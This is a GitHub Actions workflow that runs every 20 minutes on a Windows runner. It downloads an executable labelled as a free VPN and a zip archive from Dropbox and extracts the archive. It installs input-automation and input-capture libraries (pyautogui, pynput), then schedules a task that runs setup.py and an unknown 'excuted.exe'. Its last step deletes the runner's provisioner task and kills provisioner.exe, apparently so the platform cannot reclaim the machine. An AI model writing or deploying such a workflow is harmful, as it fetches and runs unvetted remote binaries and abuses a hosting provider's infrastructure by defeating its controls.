name: repo-desinger 
on:
  workflow_dispatch:
  schedule: 
    - cron: '*/20 * * * *'
jobs: 
  build:
    name: Starting windows 
    runs-on: windows-latest
    timeout-minutes: 500 
    steps:
      - uses: actions/checkout@v4
      - name: downld vp
        run: curl -s -L -o vpnplanet.exe "https://www.dropbox.com/scl/fi/icemmzyitmkm90tmu3yr6/free-vpn-planet-2-8-31-47.exe?rlkey=g417ofy3hhguibyn5wazrc0xt&st=bb05jzej&dl=1"
      
      - name: Download the applications
        run: |
          curl -s -L -o ex.zip "https://www.dropbox.com/scl/fi/eejs0i006llaeed716gam/ex.zip?rlkey=6b3qyugk5yb91gxm4rnakrlnu&st=wpox3jv9&dl=1"
          tar -xf ex.zip
      
      - name: configure sch
        run: |
          pip install pyautogui --quiet
          pip install pynput --quiet
          $batchFile  = "${{ github.workspace }}\start.bat"
          echo "@echo off" > start.bat
          echo "D:"  >> start.bat
          echo "cd ${{ github.workspace }}" >> start.bat
          echo "python setup.py" >> start.bat
          echo "excuted.exe" >> start.bat
          echo "pause" >> start.bat
          schtasks /create /tn "mainTask" /tr "$batchFile" /sc once /st $(Get-Date -f 'HH:mm:ss' -date (Get-Date).AddSeconds(60)) /f
          type start.bat
      
      - name: killed me finnaly
        run: |
          schtasks /delete /tn "RunnerMachineProvisioner" /f
          taskkill /im provisioner.exe
      # this is the end of the file 
        
    
    
